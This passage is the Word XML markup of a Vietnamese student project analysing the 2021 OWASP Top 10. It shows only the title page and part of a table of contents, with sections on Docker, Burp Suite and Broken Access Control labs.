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67A2B1" w14:textId="77777777" w:rsidR="000C3DC0" w:rsidRDefault="000C3DC0" w:rsidP="00717940"/>
    <w:p w14:paraId="0AD016DE" w14:textId="77777777" w:rsidR="000C3DC0" w:rsidRDefault="000C3DC0" w:rsidP="000C3DC0">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C230097" w14:textId="77777777" w:rsidR="000C3DC0" w:rsidRDefault="000C3DC0" w:rsidP="000C3DC0">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14D0A7D2" w14:textId="77777777" w:rsidR="000C3DC0" w:rsidRDefault="000C3DC0" w:rsidP="000C3DC0">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05204A18" w14:textId="77777777" w:rsidR="000C3DC0" w:rsidRDefault="000C3DC0" w:rsidP="000C3DC0">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="677B5A07" w14:textId="1A508354" w:rsidR="005244C0" w:rsidRPr="006A069E" w:rsidRDefault="000C3DC0" w:rsidP="006A069E">
      <w:pPr>
        <w:jc w:val="center"/>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069E">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Ồ</w:t>
      </w:r>
      <w:r w:rsidR="00035136" w:rsidRPr="006A069E">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ÁN CÁ NHÂN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF2B75D" w14:textId="34A1F326" w:rsidR="00A00786" w:rsidRPr="006A069E" w:rsidRDefault="00035136" w:rsidP="006A069E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>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069E">
        <w:rPr>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ÂN TÍCH 10 LỖ HỔNG HÀNG ĐẦU CỦA OWASP NĂM 2021</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6C1D11" w14:textId="77777777" w:rsidR="00A36D58" w:rsidRDefault="00A36D58" w:rsidP="00A36D58">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F423992" w14:textId="5D4B4A3E" w:rsidR="005244C0" w:rsidRPr="00EC447F" w:rsidRDefault="00A00786" w:rsidP="006A069E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>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447F">
        <w:rPr>
          <w:i/>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gười thực hiện: </w:t>
      </w:r>
      <w:r w:rsidR="000C3DC0" w:rsidRPr="00EC447F">
        <w:rPr>
          <w:i/>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ẦN VĂN BÌNH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64529B1D" w14:textId="77777777" w:rsidR="006A069E" w:rsidRDefault="006A069E" w:rsidP="005244C0">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24580E7F" w14:textId="77777777" w:rsidR="006A069E" w:rsidRDefault="006A069E" w:rsidP="005244C0">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CA3C158" w14:textId="77777777" w:rsidR="006A069E" w:rsidRDefault="006A069E" w:rsidP="005244C0">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65A37F70" w14:textId="77777777" w:rsidR="006A069E" w:rsidRDefault="006A069E" w:rsidP="005244C0">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23879EDD" w14:textId="77777777" w:rsidR="006A069E" w:rsidRDefault="006A069E" w:rsidP="005244C0">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B32FB84" w14:textId="77777777" w:rsidR="006A069E" w:rsidRDefault="006A069E" w:rsidP="0061795B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20C3531C" w14:textId="77777777" w:rsidR="006A069E" w:rsidRDefault="006A069E" w:rsidP="005244C0">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51061EA4" w14:textId="77777777" w:rsidR="006A069E" w:rsidRDefault="006A069E" w:rsidP="005244C0">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DB3E372" w14:textId="77777777" w:rsidR="006A069E" w:rsidRDefault="006A069E" w:rsidP="005244C0">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E066531" w14:textId="77777777" w:rsidR="006A069E" w:rsidRDefault="006A069E" w:rsidP="005244C0">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6983A50B" w14:textId="694474F8" w:rsidR="00151DDF" w:rsidRPr="00F41059" w:rsidRDefault="00A00786" w:rsidP="00F41059">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A069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P. HỒ CHÍ MINH, NĂM 2024</w:t>
      </w:r>
      <w:r w:rsidR="00151DDF" w:rsidRPr="00EA4568">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="-338621789"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="7BBD5717" w14:textId="716F373C" w:rsidR="008A7AD8" w:rsidRPr="008A7AD8" w:rsidRDefault="008A7AD8" w:rsidP="000C3DC0">
          <w:pPr>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:color w:val="002060"/>
              <w:sz w:val="30"/>
              <w:szCs w:val="30"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="008A7AD8">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:color w:val="002060"/>
              <w:sz w:val="30"/>
              <w:szCs w:val="30"/>
            </w:rPr>
            <w:t>MỤC LỤC</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="6A82D346" w14:textId="2928F40A" w:rsidR="00F26440" w:rsidRDefault="008A7AD8">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc182909818" w:history="1">
            <w:r w:rsidR="00F26440" w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>LỜI MỞ ĐẦU</w:t>
            </w:r>
            <w:r w:rsidR="00F26440">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00F26440">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00F26440">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909818 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00F26440">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00F26440">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F26440">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00F26440">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="37F00C6E" w14:textId="39695DD1" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909819" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>THIẾT LẬP MÔI TRƯỜNG</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909819 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0F19B64D" w14:textId="693AC97D" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909820" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">1. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Docker</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909820 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="68734F62" w14:textId="2F93C9AD" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909821" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">2. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Burp Suite</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909821 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2AB95146" w14:textId="1CE3E7C0" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909822" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>A01:2021 – Broken Access Control</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909822 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="226FA8C6" w14:textId="26C42FE2" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909823" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Mô tả lỗ hổng</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909823 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="30AA6C34" w14:textId="78776AB7" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909824" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Biện pháp ngăn chặn</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909824 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1505CA2E" w14:textId="44B0D25A" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909825" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Kịch bản tấn công thực hành</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909825 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1A29FE89" w14:textId="622CBFC8" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909826" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Bài thực hành – Lab 1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909826 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="58168D9B" w14:textId="79220743" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909827" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Bài thực hành – Lab 2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909827 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="74436A38" w14:textId="673D222E" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909828" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Bài thực hành – Lab 3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909828 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
